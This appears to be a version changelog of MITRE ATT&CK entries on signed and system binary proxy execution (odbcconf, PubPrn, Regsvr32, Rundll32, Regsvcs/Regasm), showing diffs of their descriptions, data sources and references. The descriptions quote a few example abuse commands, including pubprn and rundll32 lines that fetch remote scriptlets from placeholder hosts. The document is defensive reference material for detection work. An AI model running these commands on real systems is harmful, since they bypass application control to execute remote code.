x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:39:00.717000+00:002022-03-11 18:52:49.877000+00:00
descriptionAdversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft. Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft. Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[2]Command: Command ExecutionProcess: Process Creation
x_mitre_version1.02.0

[T1216.001] System Script Proxy Execution: PubPrn

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1Adversaries may use PubPrn to proxy execution of malicious rt1Adversaries may use PubPrn to proxy execution of malicious r
>emote files. PubPrn.vbs is a [Visual Basic](https://attack.m>emote files. PubPrn.vbs is a [Visual Basic](https://attack.m
>itre.org/techniques/T1059/005) script that publishes a print>itre.org/techniques/T1059/005) script that publishes a print
>er to Active Directory Domain Services. The script is signed>er to Active Directory Domain Services. The script may be si
> by Microsoft and is commonly executed through the [Windows >gned by Microsoft and is commonly executed through the [Wind
>Command Shell](https://attack.mitre.org/techniques/T1059/003>ows Command Shell](https://attack.mitre.org/techniques/T1059
>) via <code>Cscript.exe</code>. For example, the following c>/003) via <code>Cscript.exe</code>. For example, the followi
>ode publishes a printer within the specified domain: <code>c>ng code publishes a printer within the specified domain: <co
>script pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Co>de>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,D
>m</code>.(Citation: pubprn)  Adversaries may abuse PubPrn to>C=Com</code>.(Citation: pubprn)  Adversaries may abuse PubPr
> execute malicious payloads hosted on remote sites.(Citation>n to execute malicious payloads hosted on remote sites.(Cita
>: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the>tion: Enigma0x3 PubPrn Bypass) To do so, adversaries may set
> second <code>script:</code> parameter to reference a script> the second <code>script:</code> parameter to reference a sc
>let file (.sct) hosted on a remote site. An example command >riptlet file (.sct) hosted on a remote site. An example comm
>is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/fo>and is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.co
>lder/file.sct</code>. This behavior may bypass signature val>m/folder/file.sct</code>. This behavior may bypass signature
>idation restrictions and application control solutions that > validation restrictions and application control solutions t
>do not account for abuse of this script.  In later versions >hat do not account for abuse of this script.  In later versi
>of Windows (10+), <code>PubPrn.vbs</code> has been updated t>ons of Windows (10+), <code>PubPrn.vbs</code> has been updat
>o prevent proxying execution from a remote site. This is don>ed to prevent proxying execution from a remote site. This is
>e by limiting the protocol specified in the second parameter> done by limiting the protocol specified in the second param
> to <code>LDAP://</code>, vice the <code>script:</code> moni>eter to <code>LDAP://</code>, vice the <code>script:</code> 
>ker which could be used to reference remote code via HTTP(S)>moniker which could be used to reference remote code via HTT
>.>P(S).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-09-01 00:57:01.161000+00:002022-04-18 14:55:35.817000+00:00
descriptionAdversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn) Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script. In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn) Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script. In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).
x_mitre_data_sources[0]Process: Process CreationScript: Script Execution
x_mitre_data_sources[2]Script: Script ExecutionProcess: Process Creation
x_mitre_version1.12.0

[T1218.009] System Binary Proxy Execution: Regsvcs/Regasm

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may abuse Regsvcs and Regasm to proxy execution t1Adversaries may abuse Regsvcs and Regasm to proxy execution 
>of code through a trusted Windows utility. Regsvcs and Regas>of code through a trusted Windows utility. Regsvcs and Regas
>m are Windows command-line utilities that are used to regist>m are Windows command-line utilities that are used to regist
>er .NET [Component Object Model](https://attack.mitre.org/te>er .NET [Component Object Model](https://attack.mitre.org/te
>chniques/T1559/001) (COM) assemblies. Both are digitally sig>chniques/T1559/001) (COM) assemblies. Both are binaries that
>ned by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN R> may be digitally signed by Microsoft. (Citation: MSDN Regsv
>egasm)  Both utilities may be used to bypass application con>cs) (Citation: MSDN Regasm)  Both utilities may be used to b
>trol through use of attributes within the binary to specify >ypass application control through use of attributes within t
>code that should be run before registration or unregistratio>he binary to specify code that should be run before registra
>n: <code>[ComRegisterFunction]</code> or <code>[ComUnregiste>tion or unregistration: <code>[ComRegisterFunction]</code> o
>rFunction]</code> respectively. The code with the registrati>r <code>[ComUnregisterFunction]</code> respectively. The cod
>on and unregistration attributes will be executed even if th>e with the registration and unregistration attributes will b
>e process is run under insufficient privileges and fails to >e executed even if the process is run under insufficient pri
>execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)>vileges and fails to execute. (Citation: LOLBAS Regsvcs)(Cit
 >ation: LOLBAS Regasm)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:36:37.411000+00:002022-03-11 18:55:48.725000+00:00
descriptionAdversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm) Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm) Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_version1.02.0

[T1218.010] System Binary Proxy Execution: Regsvr32

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may abuse Regsvr32.exe to proxy execution of malt1Adversaries may abuse Regsvr32.exe to proxy execution of mal
>icious code. Regsvr32.exe is a command-line program used to >icious code. Regsvr32.exe is a command-line program used to 
>register and unregister object linking and embedding control>register and unregister object linking and embedding control
>s, including dynamic link libraries (DLLs), on Windows syste>s, including dynamic link libraries (DLLs), on Windows syste
>ms. Regsvr32.exe is also a Microsoft signed binary. (Citatio>ms. The Regsvr32.exe binary may also be signed by Microsoft.
>n: Microsoft Regsvr32)  Malicious usage of Regsvr32.exe may > (Citation: Microsoft Regsvr32)  Malicious usage of Regsvr32
>avoid triggering security tools that may not monitor executi>.exe may avoid triggering security tools that may not monito
>on of, and modules loaded by, the regsvr32.exe process becau>r execution of, and modules loaded by, the regsvr32.exe proc
>se of allowlists or false positives from Windows using regsv>ess because of allowlists or false positives from Windows us
>r32.exe for normal operations. Regsvr32.exe can also be used>ing regsvr32.exe for normal operations. Regsvr32.exe can als
> to specifically bypass application control using functional>o be used to specifically bypass application control using f
>ity to load COM scriptlets to execute DLLs under user permis>unctionality to load COM scriptlets to execute DLLs under us
>sions. Since Regsvr32.exe is network and proxy aware, the sc>er permissions. Since Regsvr32.exe is network and proxy awar
>ripts can be loaded by passing a uniform resource locator (U>e, the scripts can be loaded by passing a uniform resource l
>RL) to file on an external Web server as an argument during >ocator (URL) to file on an external Web server as an argumen
>invocation. This method makes no changes to the Registry as >t during invocation. This method makes no changes to the Reg
>the COM object is not actually registered, only executed. (C>istry as the COM object is not actually registered, only exe
>itation: LOLBAS Regsvr32) This variation of the technique is>cuted. (Citation: LOLBAS Regsvr32) This variation of the tec
> often referred to as a "Squiblydoo" attack and has been use>hnique is often referred to as a "Squiblydoo" and has been u
>d in campaigns targeting governments. (Citation: Carbon Blac>sed in campaigns targeting governments. (Citation: Carbon Bl
>k Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting>ack Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeti
> Mongolian Gov)  Regsvr32.exe can also be leveraged to regis>ng Mongolian Gov)  Regsvr32.exe can also be leveraged to reg
>ter a COM Object used to establish persistence via [Componen>ister a COM Object used to establish persistence via [Compon
>t Object Model Hijacking](https://attack.mitre.org/technique>ent Object Model Hijacking](https://attack.mitre.org/techniq
>s/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)>ues/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:37:32.931000+00:002022-03-11 20:41:41.503000+00:00
descriptionAdversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1218.011] System Binary Proxy Execution: Rundll32

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1Adversaries may abuse rundll32.exe to proxy execution of malt1Adversaries may abuse rundll32.exe to proxy execution of mal
>icious code. Using rundll32.exe, vice executing directly (i.>icious code. Using rundll32.exe, vice executing directly (i.
>e. [Shared Modules](https://attack.mitre.org/techniques/T112>e. [Shared Modules](https://attack.mitre.org/techniques/T112
>9)), may avoid triggering security tools that may not monito>9)), may avoid triggering security tools that may not monito
>r execution of the rundll32.exe process because of allowlist>r execution of the rundll32.exe process because of allowlist
>s or false positives from normal operations. Rundll32.exe is>s or false positives from normal operations. Rundll32.exe is
> commonly associated with executing DLL payloads (ex: <code>> commonly associated with executing DLL payloads (ex: <code>
>rundll32.exe {DLLname, DLLfunction}</code>).  Rundll32.exe c>rundll32.exe {DLLname, DLLfunction}</code>).  Rundll32.exe c
>an also be used to execute [Control Panel](https://attack.mi>an also be used to execute [Control Panel](https://attack.mi
>tre.org/techniques/T1218/002) Item files (.cpl) through the >tre.org/techniques/T1218/002) Item files (.cpl) through the 
>undocumented shell32.dll functions <code>Control_RunDLL</cod>undocumented shell32.dll functions <code>Control_RunDLL</cod
>e> and <code>Control_RunDLLAsUser</code>. Double-clicking a >e> and <code>Control_RunDLLAsUser</code>. Double-clicking a 
>.cpl file also causes rundll32.exe to execute. (Citation: Tr>.cpl file also causes rundll32.exe to execute. (Citation: Tr
>end Micro CPL)  Rundll32 can also be used to execute scripts>end Micro CPL)  Rundll32 can also be used to execute scripts
> such as JavaScript. This can be done using a syntax similar> such as JavaScript. This can be done using a syntax similar
> to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLA> to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLA
>pplication ";document.write();GetObject("script:https[:]//ww>pplication ";document.write();GetObject("script:https[:]//ww
>w[.]example[.]com/malicious.sct")"</code>  This behavior has>w[.]example[.]com/malicious.sct")"</code>  This behavior has
> been seen used by malware such as Poweliks. (Citation: This> been seen used by malware such as Poweliks. (Citation: This
> is Security Command Line Confusion)  Adversaries may also a> is Security Command Line Confusion)  Adversaries may also a
>ttempt to obscure malicious code from analysis by abusing th>ttempt to obscure malicious code from analysis by abusing th
>e manner in which rundll32.exe loads DLL function names. As >e manner in which rundll32.exe loads DLL function names. As 
>part of Windows compatibility support for various character >part of Windows compatibility support for various character 
>sets, rundll32.exe will first check for wide/Unicode then AN>sets, rundll32.exe will first check for wide/Unicode then AN
>SI character-supported functions before loading the specifie>SI character-supported functions before loading the specifie
>d function (e.g., given the command <code>rundll32.exe Examp>d function (e.g., given the command <code>rundll32.exe Examp
>leDLL.dll, ExampleFunction</code>, rundll32.exe would first >leDLL.dll, ExampleFunction</code>, rundll32.exe would first 
>attempt to execute <code>ExampleFunctionW</code>, or failing>attempt to execute <code>ExampleFunctionW</code>, or failing
> that <code>ExampleFunctionA</code>, before loading <code>Ex> that <code>ExampleFunctionA</code>, before loading <code>Ex
>ampleFunction</code>). Adversaries may therefore obscure mal>ampleFunction</code>). Adversaries may therefore obscure mal
>icious code by creating multiple identical exported function>icious code by creating multiple identical exported function
> names and appending <code>W</code> and/or <code>A</code> to> names and appending <code>W</code> and/or <code>A</code> to
> harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(> harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(
>Citation: Github NoRunDll)>Citation: Github NoRunDll) DLL functions can also be exporte
 >d and executed by an ordinal number (ex: <code>rundll32.exe 
 >file.dll,#1</code>).  Additionally, adversaries may use [Mas
 >querading](https://attack.mitre.org/techniques/T1036) techni
 >ques (such as changing DLL file names, file extensions, or f
 >unction names) to further conceal execution of a malicious p
 >ayload.(Citation: rundll32.exe defense evasion) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 21:45:53.057000+00:002022-04-19 18:12:39.357000+00:00
descriptionAdversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion) Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion) Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1). Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
external_references[1]['source_name']Trend Micro CPLrundll32.exe defense evasion
external_references[1]['description']Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.
external_references[1]['url']https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdfhttps://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/
external_references[2]['source_name']This is Security Command Line ConfusionAttackify Rundll32.exe Obscurity
external_references[2]['description']B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.
external_references[2]['url']https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/https://www.attackify.com/blog/rundll32_execution_order/
external_references[3]['source_name']Attackify Rundll32.exe ObscurityThis is Security Command Line Confusion
external_references[3]['description']Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018.
external_references[3]['url']https://www.attackify.com/blog/rundll32_execution_order/https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
x_mitre_data_sources[1]Process: Process CreationModule: Module Load
x_mitre_data_sources[3]Module: Module LoadProcess: Process Creation
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Trend Micro CPL', 'description': 'Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', 'url': 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'}
x_mitre_contributorsJames_inthe_box, Me

[T1218] System Binary Proxy Execution

Current version: 3.0

Version changed from: 2.1 → 3.0


Old Description
New Description
t1Adversaries may bypass process and/or signature-based defenst1Adversaries may bypass process and/or signature-based defens
>es by proxying execution of malicious content with signed bi>es by proxying execution of malicious content with signed, o
>naries. Binaries signed with trusted digital certificates ca>r otherwise trusted, binaries. Binaries used in this techniq
>n execute on Windows systems protected by digital signature >ue are often Microsoft-signed files, indicating that they ha
>validation. Several Microsoft signed binaries that are defau>ve been either downloaded from Microsoft or are already nati
>lt on Windows installations can be used to proxy execution o>ve in the operating system.(Citation: LOLBAS Project) Binari
>f other files.>es signed with trusted digital certificates can typically ex
 >ecute on Windows systems protected by digital signature vali
 >dation. Several Microsoft signed binaries that are default o
 >n Windows installations can be used to proxy execution of ot
 >her files or commands.  Similarly, on Linux systems adversar
 >ies may abuse trusted binaries such as <code>split</code> to
 > proxy execution of malicious commands.(Citation: split man 
 >page)(Citation: GTFO split)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 00:13:19.412000+00:002022-04-18 14:52:08.678000+00:00
nameSigned Binary Proxy ExecutionSystem Binary Proxy Execution
descriptionAdversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)
x_mitre_version2.13.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'GTFO split', 'description': 'GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.', 'url': 'https://gtfobins.github.io/gtfobins/split/'}
external_references{'source_name': 'LOLBAS Project', 'description': 'Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.', 'url': 'https://github.com/LOLBAS-Project/LOLBAS#criteria'}
external_references{'source_name': 'split man page', 'description': 'Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) — Linux manual page. Retrieved March 25, 2022.', 'url': 'https://man7.org/linux/man-pages/man1/split.1.html'}
x_mitre_contributorsWes Hurd
x_mitre_data_sourcesProcess: OS API Execution
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
x_mitre_platformsLinux
x_mitre_platformsmacOS
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: OS API Execution
x_mitre_data_sourcesWindows Registry: Windows Registry Key Modification
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T1216] System Script Proxy Execution

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1Adversaries may use scripts signed with trusted certificatest1Adversaries may use trusted scripts, often signed with certi
> to proxy execution of malicious files. Several Microsoft si>ficates, to proxy the execution of malicious files. Several 
>gned scripts that are default on Windows installations can b>Microsoft signed scripts that have been downloaded from Micr
>e used to proxy execution of other files. This behavior may >osoft or are default on Windows installations can be used to
>be abused by adversaries to execute malicious files that cou> proxy execution of other files.(Citation: LOLBAS Project) T
>ld bypass application control and signature validation on sy>his behavior may be abused by adversaries to execute malicio
>stems.(Citation: GitHub Ultimate AppLocker Bypass List)>us files that could bypass application control and signature
 > validation on systems.(Citation: GitHub Ultimate AppLocker 
 >Bypass List)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-09-01 00:57:01.576000+00:002022-04-18 14:43:46.045000+00:00
nameSigned Script Proxy ExecutionSystem Script Proxy Execution
descriptionAdversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.(Citation: LOLBAS Project) This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)
x_mitre_data_sources[1]Command: Command ExecutionScript: Script Execution
x_mitre_data_sources[2]Script: Script ExecutionCommand: Command Execution
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'LOLBAS Project', 'description': 'Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.', 'url': 'https://github.com/LOLBAS-Project/LOLBAS#criteria'}
x_mitre_contributorsWes Hurd

[T1218.012] System Binary Proxy Execution: Verclsid

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
